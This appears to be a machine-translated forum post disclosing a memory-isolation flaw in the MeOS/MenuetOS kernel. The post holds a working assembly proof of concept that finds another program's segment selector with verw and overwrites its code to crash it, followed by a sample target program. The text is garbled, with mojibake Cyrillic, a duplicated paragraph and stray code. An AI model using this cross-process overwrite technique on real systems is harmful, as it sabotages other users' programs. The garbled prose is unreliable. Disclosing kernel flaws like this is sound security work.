All segments of appendices are dumped in GDT. In result there are no restrictions that the appendix "will climb" in memory of the next program, will read there and even TO WRITE DOWN the data, çàòèðàòü sites of a code, etc. In a word, ANY program can manage in address space of ANY other program as in own. The mistake is very difficult for correcting: all logic of work of a nucleus is fastened on this âåùå! (a similar mistake in due time has admitted Microsoft in Windows 95).
Memory in MeOS is segmented. To each appendix the own segment (or some segments) within the limits of which it can work almost is allocated as will want. These segments also make address space of the appendix. To each segment there corresponds the SELECTOR - special number, something like number of a segment.
Segments with which the program can work are defined only those selectors which nucleus MeOS places at start of the program in registers cs, ds, ss, fs, gs. For access to another's memory - to write down in these registers the necessary number - the selector. Each segment possesses the certain privileges. The part of segments, for example, belongs to nucleus MeOS. They with privileges and attempt to load them in segment registers will lead to that MeOS "will kill" such program. Besides it is far from being any number is the selector of some segment, and attempt to load the incorrect selector also will terminate in compulsory end of the program. Before the interested person to work with memory of the neighbour there are following problems: 1. To define the program from which it wants to work 2. To define the selector of its segment AS IT TO MAKE (EXAMPLES). In the beginning we shall disassemble the elementary example, I have named it antip.asm:
use32
org 0x0
db 'MENUET01'; standard heading
dd 0x01
dd START
dd I_END
dd 0x1000
dd 0x07ff
dd 0x0, 0x0
START:; the beginning
mov ax, ds; we shall receive in ax the selector
; a "native" segment
find_loop:; a cycle of search
sub ax, 1*8; we move downwards on selectors
verw ax; the selector is true?
jnz find_loop; no, we go further
; yes, the another's selector
mov es, ax; we place it in es
;well, now we shall jam an another's code, having caused a glitch
cld
mov ecx, 1000h; 1000h
xor esi, esi; esi=0
xor edi, edi; edi=0
rep movsd; yes, we shall jam
I_END:

This example searches for the first got another's segment. Search is carried out in a cycle find_loop. First of all we deduct 8 ("distance" between correct selectors, see the documentation) and, ò.î., we receive in ax already other selector. However early to be pleased: the found value can not correspond to any segment (the incorrect selector), or to correspond to an exclusive segment. For check of selectors in processors Intel, since i386, special instructions are entered. We also shall take advantage of them.
verw This instruction checks the selector, whether the specified number the correct selector is, and whether our privileges to carry out record in this segment (but not reading are sufficient!). If everything is all right, verw will establish a flag zf. The cycle (jnz) goes until zf will not be established. When the selector is found, we place it in es. Now access to the found address space is open! Further, using movsd, I am simple çàòèðàþ the first 16384 bytes (since the zero address) the found program. The output from our example is not necessary - value ecx is picked up so that MeOS "has killed" also our program too.
So, compile in fasm this example and start it (more conveniently - with the included board of debugging). You óâèäåòå as this program "will be cut down", having pulled behind itself somebody else.
Now we shall consider a case when we need to find strictly certain program in memory and to execute with it some actions. First of all, the text of our "experimental" program, extst.asm. We also shall search for her in memory:

use32
org 0x0
db ’MENUET01’
dd 0x01
dd START
dd I_END
dd 0x100000
dd 0x7fff0
dd 0x0 , 0x0

sign db ’TEST’ ;The signature for search

START:
jmp $ ;And at once - lag
red:
call draw_window
still:
mov eax,10
int 0x40

cmp eax,1
je red
cmp eax,2
je key
cmp eax,3
je button

jmp still

key:
mov eax,2
int 0x40
jmp still

button:
or eax,-1
int 0x40

draw_window:
mov eax,12
mov ebx,1
int 0x40
mov eax,0
mov ebx,0*65536+400
mov ecx,100*65536+50
mov edx,0x03ffffff
mov esi,0x805080d0
mov edi,0x005080d0
int 0x40

mov eax,12
mov ebx,2
int 0x40
ret
I_END:

Now we shall consider a case when we need to find strictly certain program in memory and to execute with it some actions. First of all, the text of our "experimental" program, extst.asm. We also shall search for her in memory:

Sorry from my English. I hope you will understand a problem.
It not all. Many people speak that some things in kernel are badly realized.